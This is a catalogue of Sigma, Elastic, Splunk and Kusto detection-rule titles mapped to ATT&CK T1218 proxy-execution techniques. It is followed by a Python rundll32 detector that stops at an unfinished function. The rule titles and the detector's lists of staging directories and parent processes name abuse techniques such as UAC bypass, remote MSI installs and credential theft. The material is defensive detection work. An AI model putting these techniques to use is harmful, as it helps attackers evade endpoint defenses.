- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Sigma SCR File Write Event test
- Sigma ScreenSaver Registry Key Set test
- Elastic Script Execution via Microsoft HTML Application production
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Sigma Scripting/CommandLine Process Spawned Regsvr32 test
- Sigma Sdiagnhost Calling Suspicious Child Process test
- Sigma Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location test
- Sigma Self Extraction Directive File Created In Potentially Suspicious Location test
- Sigma Sensitive File Dump Via Print.EXE test
- Elastic Service Control Spawned via Script Interpreter production
- Splunk Shell Spawned by Web Server - Windows (Windows Event Log)
- Sigma Shell32 DLL Execution in Suspicious Directory test
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Sofacy Trojan Loader Activity test
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious AddinUtil.EXE CommandLine Execution test
- Sigma Suspicious AgentExecutor PowerShell Execution test
- Sigma Suspicious BitLocker Access Agent Update Utility Execution experimental
- Splunk Suspicious Child Process for hh.exe (Sysmon)
- Splunk Suspicious Child Process for hh.exe (Windows Event Log)
- Splunk Suspicious Child Process for mshta.exe (Sysmon)
- Splunk Suspicious Child Process for mshta.exe (Windows Event Log)
- Sigma Suspicious Child Process Of BgInfo.EXE test
- Sigma Suspicious Control Panel DLL Load test
- Sigma Suspicious Csi.exe Usage test
- Sigma Suspicious DLL Loaded via CertOC.EXE test
- Sigma Suspicious DotNET CLR Usage Log Artifact test
- Sigma Suspicious Driver/DLL Installation Via Odbcconf.EXE test
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Splunk Suspicious Execution via Microsoft Common Console (Sysmon)
- Splunk Suspicious Execution via Microsoft Common Console (Windows Event Log)
- Elastic Suspicious Execution via MSIEXEC production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious HH.EXE Execution test
- Splunk Suspicious IcedID Rundll32 Cmdline production
- Sigma Suspicious JavaScript Execution Via Mshta.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft Diagnostics Wizard Execution production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Sigma Suspicious Microsoft Office Child Process test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Kusto Suspicious MSC File Launched
- Sigma Suspicious MSDT Parent Process test
- Sigma Suspicious MSHTA Child Process test
- Splunk Suspicious mshta child process production
- Splunk Suspicious mshta spawn production
- Sigma Suspicious MsiExec Embedding Parent test
- Sigma Suspicious Msiexec Execute Arbitrary DLL test
- Sigma Suspicious Msiexec Quiet Install From Remote Location test
- Splunk Suspicious Parent Process for msiexec.exe (Sysmon)
- Splunk Suspicious Parent Process for msiexec.exe (Windows Event Log)
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious Provlaunch.EXE Child Process test
- Splunk Suspicious reCAPTCHA Command Line (PowerShell)
- Splunk Suspicious reCAPTCHA Command Line (Sysmon)
- Sigma Suspicious Regsvr32 Execution From Remote Share test
- Splunk Suspicious Regsvr32 Register Suspicious Path production
- Sigma Suspicious Response File Execution Via Odbcconf.EXE test
- Sigma Suspicious Rundll32 Activity Invoking Sys File test
- Splunk Suspicious Rundll32 dllregisterserver production
- Sigma Suspicious Rundll32 Execution With Image Extension test
- Splunk Suspicious Rundll32 no Command Line Arguments production
- Splunk Suspicious Rundll32 PluginInit production
- Sigma Suspicious Rundll32 Setupapi.dll Activity test
- Splunk Suspicious Rundll32 StartW production
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Shell Execution via Velociraptor production
- Sigma Suspicious ShellExec_RunDLL Call Via Ordinal test
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Suspicious Speech Runtime Binary Child Process experimental
- Elastic Suspicious Troubleshooting Pack Cabinet Execution production
- Kusto Suspicious use of CPL file
- Sigma Suspicious Vsls-Agent Command With AgentExtensionPath Load test
- Elastic Suspicious Windows Command Shell Arguments production
- Sigma Suspicious WMIC Execution Via Office Process test
- Elastic Suspicious WMIC XSL Script Execution production
- Sigma Suspicious WmiPrvSE Child Process test
- Sigma Suspicious ZipExec Execution test
- Sigma SyncAppvPublishingServer Bypass Powershell Restriction - PS Module test
- Sigma SyncAppvPublishingServer Execute Arbitrary PowerShell Code test
- Splunk SyncAppvPublishingServer Execution (Windows Event Log)
- Sigma SyncAppvPublishingServer Execution to Bypass Powershell Restriction test
- Sigma SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code test
- Sigma Time Travel Debugging Utility Usage test
- Sigma Time Travel Debugging Utility Usage - Image test
- Elastic UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer production
- Splunk UAC Bypass MMC Load Unsigned Dll production
- Elastic UAC Bypass via Windows Firewall Snap-In Hijack production
- Splunk UAC Bypass With Colorui COM Object production
- Sigma Uncommon Assistive Technology Applications Execution Via AtBroker.EXE test
- Sigma Uncommon AddinUtil.EXE CommandLine Execution test
- Sigma Uncommon Child Process Of AddinUtil.EXE test
- Sigma Uncommon Child Process Of Appvlp.EXE test
- Sigma Uncommon Child Process Of BgInfo.EXE test
- Sigma Uncommon Child Process Of Defaultpack.EXE test
- Sigma Uncommon Child Process Of Setres.EXE test
- Sigma Uncommon Child Process Spawned By Odbcconf.EXE test
- Sigma Uncommon Link.EXE Parent Process test
- Splunk Uninstall App Using MsiExec production
- Sigma Unsigned DLL Loaded by Windows Utility test
- Elastic Unusual Child Processes of RunDLL32 production
- Elastic Unusual Execution via Microsoft Common Console File production
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Network Connection via DllHost production
- Elastic Unusual Network Connection via RunDLL32 production
- Elastic Unusual Process Network Connection production
- Sigma Use of Scriptrunner.exe test
- Sigma Use Of The SFTP.EXE Binary As A LOLBIN test
- Sigma Use of VisualUiaVerifyNative.exe test
- Splunk Verclsid CLSID Execution production
- Sigma Verclsid.exe Runs COM Object test
- Sigma Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution test
- Sigma Visual Studio NodejsTools PressAnyKey Renamed Execution test
- Splunk Wbemprox COM Object Execution production
- Splunk Windows Advanced Installer MSIX with AI_STUBS Execution production
- Splunk Windows Application Whitelisting Bypass Attempt via Rundll32 production
- Splunk Windows Binary Proxy Execution Mavinject DLL Injection production
- Splunk Windows BitLockerToGo Process Execution production
- Splunk Windows BitLockerToGo with Network Activity production
- Splunk Windows Diskshadow Proxy Execution production
- Splunk Windows DotNet Binary in Non Standard Path production
- Splunk Windows Execute Arbitrary Commands with MSDT production
- Splunk Windows Execution of Microsoft MSC File In Suspicious Path production
- Splunk Windows GrimResource - MMC Process Accessing APDS DLL production
- Splunk Windows HTTP Network Communication From MSIExec production
- Elastic Windows Installer with Suspicious Properties production
- Splunk Windows InstallUtil Credential Theft production
- Splunk Windows InstallUtil in Non Standard Path production
- Splunk Windows InstallUtil Remote Network Connection production
- Splunk Windows InstallUtil Uninstall Option production
- Splunk Windows InstallUtil URL in Command Line production
- Splunk Windows IOBit Unlocker Extension DLL Registration via Regsvr32 production
- Splunk Windows LOLBAS Executed As Renamed File production
- Splunk Windows LOLBAS Executed Outside Expected Path production
- Splunk Windows Mock Trusted Directory MSC File Creation production
- Splunk Windows MSC EvilTwin Directory Path Manipulation production
- Splunk Windows Mshta Execution In Registry production
- Splunk Windows MSHTA Writing to World Writable Path production
- Splunk Windows MSI Rollback Script Deleted By Non-Msiexec Process production
- Splunk Windows MSIExec DLLRegisterServer production
- Splunk Windows MsiExec HideWindow Rundll32 Execution production
- Splunk Windows MSIExec Remote Download production
- Splunk Windows MSIExec Spawn Discovery Command production
- Splunk Windows MSIExec Spawn WinDBG production
- Splunk Windows MSIExec Unregister DLLRegisterServer production
- Sigma Windows MSIX Package Support Framework AI_STUBS Execution experimental
- Splunk Windows Odbcconf Hunting production
- Splunk Windows Odbcconf Load DLL production
- Splunk Windows Odbcconf Load Response File production
- Splunk Windows Process Writing File to World Writable Path production
- Splunk Windows Proxy Execution of .NET Utilities via Scripts production
- Splunk Windows Rasautou DLL Execution production
- Splunk Windows Regsvr32 Renamed Binary production
- Splunk Windows Rundll32 Apply User Settings Changes production
- Splunk Windows Rundll32 Load DLL in Temp Dir production
- Splunk Windows Rundll32 with Non-Standard File Extension production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Sigma Windows Shell/Scripting Processes Spawning Suspicious Programs test
- Splunk Windows System Binary Proxy Execution Compiled HTML File Decompile production
- Splunk Windows System Script Proxy Execution Syncappvpublishingserver production
- Splunk Windows Unusual Process Load Mozilla NSS-Mozglue Module production
- Sigma Winrs Local Command Execution experimental
- Sigma Wlrmdr.EXE Uncommon Argument Or Child Process experimental
- Sigma WSL Child Process Anomaly test
- Splunk wuauclt.exe Network Connection (Sysmon)
- Splunk wuauclt.exe Network Connection (Windows Event Log)
- Sigma XBAP Execution From Uncommon Locations Via PresentationHost.EXE test
- Sigma ZxShell Malware test
System Binary Proxy Execution: Compiled HTML File T1218.001 22 rules
- Splunk Detect HTML Help Renamed production
- Splunk Detect HTML Help Spawn Child Process production
- Splunk Detect HTML Help URL in Command Line production
- Splunk Detect HTML Help Using InfoTech Storage Handlers production
- Sigma HH.EXE Execution test
- Splunk hh.exe Execution (PowerShell)
- Splunk hh.exe Execution (Sysmon)
- Splunk hh.exe Execution (Windows Event Log)
- Sigma HH.EXE Initiated HTTP Network Connection test
- Splunk hh.exe Remote File Execution (PowerShell)
- Splunk hh.exe Remote File Execution (Sysmon)
- Splunk hh.exe Remote File Execution (Windows Event Log)
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Elastic Network Connection via Compiled HTML File production
- Sigma OneNote.EXE Execution of Malicious Embedded Scripts test
- Elastic Process Activity via Compiled HTML File production
- Sigma Remote CHM File Download/Execution Via HH.EXE test
- Splunk Suspicious Child Process for hh.exe (Sysmon)
- Splunk Suspicious Child Process for hh.exe (Windows Event Log)
- Sigma Suspicious HH.EXE Execution test
- Elastic Suspicious MS Office Child Process production
- Splunk Windows System Binary Proxy Execution Compiled HTML File Decompile production
System Binary Proxy Execution: Control Panel T1218.002 10 rules
- Splunk Control Loading from World Writable Directory production
- Splunk Control Panel Abuse (Sysmon)
- Splunk Control Panel Abuse (Windows Event Log)
- Sigma Control Panel Items test
- Elastic Control Panel Process with Unusual Arguments production
- Splunk Control_RunDLL Call from Command Line (Sysmon)
- Splunk Control_RunDLL Call from Command Line (Windows Event Log)
- Elastic Suspicious MS Office Child Process production
- Kusto Suspicious use of CPL file
- Elastic Unusual Network Activity from a Windows System Binary production
System Binary Proxy Execution: CMSTP T1218.003 23 rules
- Sigma Bypass UAC via CMSTP test
- Splunk CMLUA Or CMSTPLUA UAC Bypass production
- Splunk Cmstp Execution (Sysmon)
- Splunk Cmstp Execution (Windows Event Log)
- Sigma CMSTP Execution Process Access stable
- Sigma CMSTP Execution Process Creation stable
- Sigma CMSTP Execution Registry Event stable
- Sigma CMSTP UAC Bypass via COM Object Access stable
- Elastic Delayed Execution via Ping production
- Sigma DLL Loaded From Suspicious Location Via Cmspt.EXE test
- Elastic Execution from Unusual Directory - Command Line production
- Sigma Outbound Network Connection Initiated By Cmstp.EXE test
- Elastic Potential Defense Evasion via CMSTP.exe production
- Elastic Suspicious .NET Code Compilation production
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Splunk UAC Bypass With Colorui COM Object production
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Process Network Connection production
- Splunk Wbemprox COM Object Execution production
- Splunk Windows Unusual Process Load Mozilla NSS-Mozglue Module production
System Binary Proxy Execution: InstallUtil T1218.004 16 rules
- Elastic Delayed Execution via Ping production
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of Persistent Suspicious Program production
- Elastic InstallUtil Activity production
- Elastic InstallUtil Process Making Network Connections production
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Elastic Unusual Network Activity from a Windows System Binary production
- Splunk Windows DotNet Binary in Non Standard Path production
- Splunk Windows InstallUtil Credential Theft production
- Splunk Windows InstallUtil in Non Standard Path production
- Splunk Windows InstallUtil Remote Network Connection production
- Splunk Windows InstallUtil Uninstall Option production
- Splunk Windows InstallUtil URL in Command Line production
System Binary Proxy Execution: Mshta T1218.005 51 rules
- Elastic Command and Scripting Interpreter via Windows Scripts production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Elastic Delayed Execution via Ping production
- Splunk Detect mshta inline hta execution production
- Splunk Detect mshta renamed production
- Splunk Detect MSHTA Url in Command Line production
- Splunk Detect Rundll32 Inline HTA Execution production
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of a Downloaded Windows Script production
- Elastic Execution of Persistent Suspicious Program production
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Elastic Incoming DCOM Lateral Movement via MSHTA production
- Sigma MSHTA Execution with Suspicious File Extensions test
- Elastic Mshta Making Network Connections production
- Splunk Mshta spawning Rundll32 OR Regsvr32 Process production
- Splunk MSHTA.exe execution (PowerShell)
- Splunk MSHTA.exe execution (Sysmon)
- Splunk MSHTA.exe execution (Windows Event Log)
- Splunk mshta.exe File Download (PowerShell)
- Splunk mshta.exe File Download (Sysmon)
- Splunk mshta.exe File Download (Windows Event Log)
- Sigma Potential Baby Shark Malware Activity test
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Potential LethalHTA Technique Execution test
- Elastic Process Activity via Compiled HTML File production
- Sigma Remotely Hosted HTA File Executed Via Mshta.EXE test
- Elastic Script Execution via Microsoft HTML Application production
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Elastic Service Control Spawned via Script Interpreter production
- Elastic Suspicious .NET Code Compilation production
- Splunk Suspicious Child Process for mshta.exe (Sysmon)
- Splunk Suspicious Child Process for mshta.exe (Windows Event Log)
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious JavaScript Execution Via Mshta.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Sigma Suspicious MSHTA Child Process test
- Splunk Suspicious mshta child process production
- Splunk Suspicious mshta spawn production
- Elastic Suspicious PDF Reader Child Process production
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Windows Command Shell Arguments production
- Elastic Unusual Network Activity from a Windows System Binary production
- Splunk Windows Mshta Execution In Registry production
- Splunk Windows MSHTA Writing to World Writable Path production
- Splunk Windows Process Writing File to World Writable Path production
System Binary Proxy Execution: Msiexec T1218.007 50 rules
- Sigma DllUnregisterServer Function Call Via Msiexec.EXE test
- Elastic Execution of a Downloaded Windows Script production
- Sigma MSI Installation From Web test
- Splunk MSI Installation via Appcert (PowerShell)
- Splunk MSI Installation via Appcert (Sysmon)
- Splunk MSI Installation via Appcert (Windows Event Log)
- Splunk Msiexec Abuse (Sysmon)
- Splunk Msiexec Abuse (Windows Event Log)
- Splunk MSIExec Install MSI File (Sysmon)
- Splunk MSIExec Install MSI File (Windows Event Log)
- Sigma Msiexec Quiet Installation test
- Elastic MsiExec Service Child Process With Network Connection production
- Sigma MsiExec Web Install test
- Splunk MSIExec.exe Execution (Sysmon)
- Splunk MSIExec.exe Execution (Windows Event Log)
- Sigma Msiexec.EXE Initiated Network Connection Over HTTP test
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Elastic Persistence via a Windows Installer production
- Elastic Potential Escalation via Vulnerable MSI Repair production
- Elastic Potential Remote File Execution via MSIEXEC production
- Elastic Potential Remote Install via MsiExec production
- Sigma PowerShell WMI Win32_Product Install MSI test
- Splunk Remote .msi Installation (PowerShell)
- Splunk Remote .msi Installation (PowerShell)
- Splunk Remote .msi Installation (Sysmon)
- Splunk Remote .msi Installation (Sysmon)
- Splunk Remote .msi Installation (Windows Event Log)
- Splunk Remote .msi Installation (Windows Event Log)
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Execution via MSIEXEC production
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Sigma Suspicious MsiExec Embedding Parent test
- Sigma Suspicious Msiexec Execute Arbitrary DLL test
- Sigma Suspicious Msiexec Quiet Install From Remote Location test
- Splunk Suspicious Parent Process for msiexec.exe (Sysmon)
- Splunk Suspicious Parent Process for msiexec.exe (Windows Event Log)
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Uninstall App Using MsiExec production
- Elastic Unusual Network Activity from a Windows System Binary production
- Splunk Windows HTTP Network Communication From MSIExec production
- Elastic Windows Installer with Suspicious Properties production
- Splunk Windows MSI Rollback Script Deleted By Non-Msiexec Process production
- Splunk Windows MSIExec DLLRegisterServer production
- Splunk Windows MsiExec HideWindow Rundll32 Execution production
- Splunk Windows MSIExec Remote Download production
- Splunk Windows MSIExec Spawn Discovery Command production
- Splunk Windows MSIExec Spawn WinDBG production
- Splunk Windows MSIExec Unregister DLLRegisterServer production
System Binary Proxy Execution: Odbcconf T1218.008 17 rules
- Sigma Driver/DLL Installation Via Odbcconf.EXE test
- Sigma New DLL Registered Via Odbcconf.EXE test
- Sigma Odbcconf.EXE Suspicious DLL Location test
- Sigma Potentially Suspicious DLL Registered Via Odbcconf.EXE test
- Sigma Response File Execution Via Odbcconf.EXE test
- Sigma Suspicious Driver/DLL Installation Via Odbcconf.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious Response File Execution Via Odbcconf.EXE test
- Sigma Uncommon Child Process Spawned By Odbcconf.EXE test
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Process Network Connection production
- Splunk Windows Odbcconf Hunting production
- Splunk Windows Odbcconf Load DLL production
- Splunk Windows Odbcconf Load Response File production
System Binary Proxy Execution: Regsvcs/Regasm T1218.009 17 rules
- Elastic Delayed Execution via Ping production
- Splunk Detect Regasm Spawning a Process production
- Splunk Detect Regasm with Network Connection production
- Splunk Detect Regasm with no Command Line Arguments production
- Splunk Detect Regsvcs Spawning a Process production
- Splunk Detect Regsvcs with Network Connection production
- Splunk Detect Regsvcs with No Command Line Arguments production
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Network Connection via Registration Utility production
- Sigma Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location test
- Sigma Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension test
- Sigma RegAsm.EXE Execution Without CommandLine Flags or Files experimental
- Sigma RegAsm.EXE Initiating Network Connection To Public IP test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
System Binary Proxy Execution: Regsvr32 T1218.010 48 rules
- Elastic Delayed Execution via Ping production
- Splunk Detect Regsvr32 Application Control Bypass production
- Sigma DNS Query Request By Regsvr32.EXE test
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of Persistent Suspicious Program production
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Malicious InProcServer32 Modification production
- Sigma Network Connection Initiated By Regsvr32.EXE test
- Elastic Network Connection via Registration Utility production
- Sigma Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 test
- Elastic Potential Command and Control via Internet Explorer production
- Sigma Potential EmpireMonkey Activity test
- Sigma Potential Regsvr32 Commandline Flag Anomaly test
- Sigma Potentially Suspicious Child Process Of Regsvr32 test
- Sigma Potentially Suspicious Regsvr32 HTTP IP Pattern test
- Sigma Potentially Suspicious Regsvr32 HTTP/FTP Pattern test
- Sigma Regsvr32 DLL Execution With Suspicious File Extension test
- Splunk regsvr32 Execution (PowerShell)
- Splunk regsvr32 Execution (Sysmon)
- Splunk regsvr32 Execution (Windows Event Log)
- Sigma Regsvr32 Execution From Highly Suspicious Location test
- Sigma Regsvr32 Execution From Potential Suspicious Location test
- Splunk regsvr32 Referencing Unusual Paths (Sysmon)
- Splunk regsvr32 Referencing Unusual Paths (Windows Event Log)
- Kusto Regsvr32 Rundll32 Image Loads Abnormal Extension available
- Kusto Regsvr32 Rundll32 with Anomalous Parent Process available
- Splunk Regsvr32 Silent and Install Param Dll Loading production
- Splunk Regsvr32 with Known Silent Switch Cmdline production
- Sigma Scripting/CommandLine Process Spawned Regsvr32 test
- Elastic Service Control Spawned via Script Interpreter production
- Elastic Suspicious .NET Code Compilation production
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious HH.EXE Execution test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Sigma Suspicious Microsoft Office Child Process test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious Regsvr32 Execution From Remote Share test
- Splunk Suspicious Regsvr32 Register Suspicious Path production
- Elastic Suspicious Windows Command Shell Arguments production
- Sigma Suspicious WMIC Execution Via Office Process test
- Sigma Suspicious WmiPrvSE Child Process test
- Sigma Unsigned DLL Loaded by Windows Utility test
- Elastic Unusual Network Activity from a Windows System Binary production
- Splunk Windows IOBit Unlocker Extension DLL Registration via Regsvr32 production
- Splunk Windows Regsvr32 Renamed Binary production
System Binary Proxy Execution: Rundll32 T1218.011 121 rules
- Sigma APT29 2018 Phishing Campaign CommandLine Indicators stable
- Sigma APT29 2018 Phishing Campaign File Indicators stable
- Sigma Bad Opsec Defaults Sacrificial Processes With Improper Arguments test
- Sigma CobaltStrike Load by Rundll32 test
- Sigma Code Execution via Pcwutl.dll test
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Control_RunDLL Call from Command Line (Sysmon)
- Splunk Control_RunDLL Call from Command Line (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Sigma DLL Call by Ordinal Via Rundll32.EXE stable
- Splunk DLL Called with RS32 (PowerShell)
- Splunk DLL Called with RS32 (Sysmon)
- Splunk DLL Called with RS32 (Windows Event Log)
- Splunk DLL Called with Uncommon Function (PowerShell)
- Splunk DLL Called with Uncommon Function (Sysmon)
- Splunk DLL Called with Uncommon Function (Windows Event Log)
- Splunk DLL Execution from Uncommon Process (PowerShell)
- Splunk DLL Execution from Uncommon Process (Sysmon)
- Splunk DLL Execution from Uncommon Process (Windows Event Log)
- Splunk DLLRegisterServer Called from Command Line (PowerShell)
- Splunk DLLRegisterServer Called from Command Line (Sysmon)
- Splunk DLLRegisterServer Called from Command Line (Windows Event Log)
- Sigma Equation Group DLL_U Export Function Load stable
- Sigma EvilNum APT Golden Chickens Deployment Via OCX Files test
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via Microsoft DotNet ClickOnce Host production
- Elastic File or Directory Deletion Command production
- Sigma Fireball Archer Install test
- Sigma HackTool - F-Secure C3 Load by Rundll32 test
- Sigma HackTool - RedMimicry Winnti Playbook Execution test
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Sigma IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 test
- Sigma Kapeka Backdoor Execution Via RunDLL32.EXE test
- Sigma Kapeka Backdoor Loaded Via Rundll32.EXE test
- Sigma NotPetya Ransomware Activity test
- Sigma Outbound Network Connection To Public IP Via Winlogon test
- Sigma Potential Bumblebee Remote Thread Creation test
- Elastic Potential Command and Control via Internet Explorer production
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential Credential Access via Windows Utilities production
- Sigma Potential Emotet Rundll32 Execution test
- Elastic Potential Local NTLM Relay via HTTP production
- Sigma Potential PowerShell Execution Via DLL test
- Elastic Potential Protocol Tunneling via Yuze production
- Sigma Potential Raspberry Robin CPL Execution Activity test
- Sigma Potentially Suspicious Rundll32 Activity test
- Sigma Potentially Suspicious Rundll32.EXE Execution of UDL File test
- Sigma Process Access via TrolleyExpress Exclusion test
- Kusto Regsvr32 Rundll32 Image Loads Abnormal Extension available
- Kusto Regsvr32 Rundll32 with Anomalous Parent Process available
- Sigma Remote Thread Creation Via PowerShell In Uncommon Target test
- Sigma Rhadamanthys Stealer Module Launch Via Rundll32.EXE test
- Splunk RunDLL Loading DLL By Ordinal production
- Splunk Rundll32 Command Line (PowerShell)
- Splunk Rundll32 Command Line (Sysmon)
- Splunk Rundll32 Command Line (Windows Event Log)
- Splunk Rundll32 Control RunDLL Hunt production
- Splunk Rundll32 Control RunDLL World Writable Directory production
- Splunk Rundll32 DNSQuery production
- Sigma Rundll32 Execution With Uncommon DLL Extension test
- Sigma Rundll32 InstallScreenSaver Execution test
- Sigma Rundll32 Internet Connection test
- Splunk Rundll32 LockWorkStation production
- Splunk Rundll32 Process Creating Exe Dll Files production
- Sigma RunDLL32 Spawning Explorer test
- Splunk Rundll32 Suspicious Command Line (PowerShell)
- Splunk Rundll32 Suspicious Command Line (Sysmon)
- Splunk Rundll32 Suspicious Command Line (Windows Event Log)
- Splunk rundll32 Suspicious Parent Process (Sysmon)
- Splunk rundll32 Suspicious Parent Process (Windows Event Log)
- Sigma Rundll32 UNC Path Execution test
- Splunk Rundll32 with no Command Line Arguments with Network production
- Splunk rundll32 with No DLL in Command Line (Sysmon)
- Splunk rundll32 with No DLL in Command Line (Windows Event Log)
- Splunk Rundll32.exe as Parent Process (Sysmon)
- Splunk Rundll32.exe as Parent Process (Windows Event Log)
- Splunk rundll32.exe Executing DLL from Non-standard Directory (PowerShell)
- Splunk rundll32.exe Executing DLL from Non-standard Directory (Sysmon)
- Splunk rundll32.exe Executing DLL from Non-standard Directory (Windows Event Log)
- Sigma SCR File Write Event test
- Sigma ScreenSaver Registry Key Set test
- Elastic Script Execution via Microsoft HTML Application production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Shell32 DLL Execution in Suspicious Directory test
- Sigma Sofacy Trojan Loader Activity test
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Control Panel DLL Load test
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious HH.EXE Execution test
- Splunk Suspicious IcedID Rundll32 Cmdline production
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Elastic Suspicious MS Office Child Process production
- Sigma Suspicious Rundll32 Activity Invoking Sys File test
- Splunk Suspicious Rundll32 dllregisterserver production
- Sigma Suspicious Rundll32 Execution With Image Extension test
- Splunk Suspicious Rundll32 no Command Line Arguments production
- Splunk Suspicious Rundll32 PluginInit production
- Sigma Suspicious Rundll32 Setupapi.dll Activity test
- Splunk Suspicious Rundll32 StartW production
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Shell Execution via Velociraptor production
- Sigma Suspicious ShellExec_RunDLL Call Via Ordinal test
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Unsigned DLL Loaded by Windows Utility test
- Elastic Unusual Child Processes of RunDLL32 production
- Elastic Unusual Network Connection via RunDLL32 production
- Splunk Windows Application Whitelisting Bypass Attempt via Rundll32 production
- Splunk Windows LOLBAS Executed As Renamed File production
- Splunk Windows LOLBAS Executed Outside Expected Path production
- Splunk Windows Rundll32 Apply User Settings Changes production
- Splunk Windows Rundll32 Load DLL in Temp Dir production
- Splunk Windows Rundll32 with Non-Standard File Extension production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Sigma ZxShell Malware test
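The rundll32 rules listed above keep returning to the same handful of predicates: no module on the command line, a module whose extension is not .dll or .cpl, a module loaded from a UNC path or a user-writable directory, an export invoked by ordinal (#N), the javascript:/vbscript: protocol-handler trick, a renamed rundll32 binary, and an Office or script-host parent. The Python below is an added example, written for this page and not taken from any of the listed rules, that implements those predicates over constructed Sysmon-style process-creation events. The directory lists, the parent list, the field names and the predicate names are this editor's assumptions; the checks are an approximation of what the titles describe, not the vendors' rule bodies.

```python
"""Added example: approximate rundll32 (T1218.011) predicates over Sysmon-style
process-creation events. The checks are this editor's reading of what the rule
titles above describe, not the vendors' rule bodies; the events at the bottom
are constructed, not real telemetry."""
import ntpath
import re
from dataclasses import dataclass

# Where DLLs normally live on a default install (assumes the system drive is C:).
STANDARD_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\",
                     "c:\\program files\\", "c:\\program files (x86)\\")
# Directories any user can write to: the usual staging location for a dropped DLL.
WRITABLE_DIRS = ("\\temp\\", "\\tmp\\", "\\appdata\\", "\\users\\public\\", "\\programdata\\",
                 "\\perflogs\\", "\\windows\\tasks\\")
SUSPICIOUS_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "mshta.exe",
                      "wscript.exe", "cscript.exe")
COMMON_EXTENSIONS = (".dll", ".cpl")

@dataclass
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str
    original_file_name: str = ""  # Sysmon OriginalFileName, from the PE version resource

def tokenize(cmdline):
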